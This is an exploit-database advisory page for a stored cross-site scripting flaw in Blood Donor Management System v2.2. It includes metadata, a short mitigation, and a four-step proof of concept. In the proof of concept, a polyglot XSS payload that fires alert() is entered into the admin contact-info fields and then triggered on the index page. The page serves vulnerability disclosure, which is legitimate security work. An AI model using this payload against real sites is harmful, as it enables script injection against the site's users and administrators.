header-logo
Suggest Exploit
vendor:
Blood Donor Management System
by:
SoSPiro
3.1
CVSS
MEDIUM
Stored Cross-Site Scripting (XSS)
79
CWE
Product Name: Blood Donor Management System
Affected Version From: v2.2
Affected Version To: v2.2
Patch Exists: NO
Related CWE:
CPE: a:phpgurukul:blood_donor_management_system:2.2
Metasploit:
Other Scripts:
Platforms Tested: Windows
2023

Blood Bank & Donor Management System v2.2 – Stored XSS

The Blood Donor Management System v2.2 is vulnerable to stored XSS. By modifying certain input fields like 'Adress', 'Email id', or 'Contact Number' with a crafted payload, an attacker can trigger XSS when the affected page is loaded.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to sanitize user-supplied data and prevent the execution of malicious scripts.
Source

Exploit-DB raw data:

# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS
# Application: Blood Donor Management System
# Version: v2.2   
# Bugs:  Stored XSS
# Technology: PHP
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
# Date: 12.09.2023
# Author: SoSPiro
# Tested on: Windows

#POC
========================================
1. Login to admin account
2. Go to /admin/update-contactinfo.php
3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload.
4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.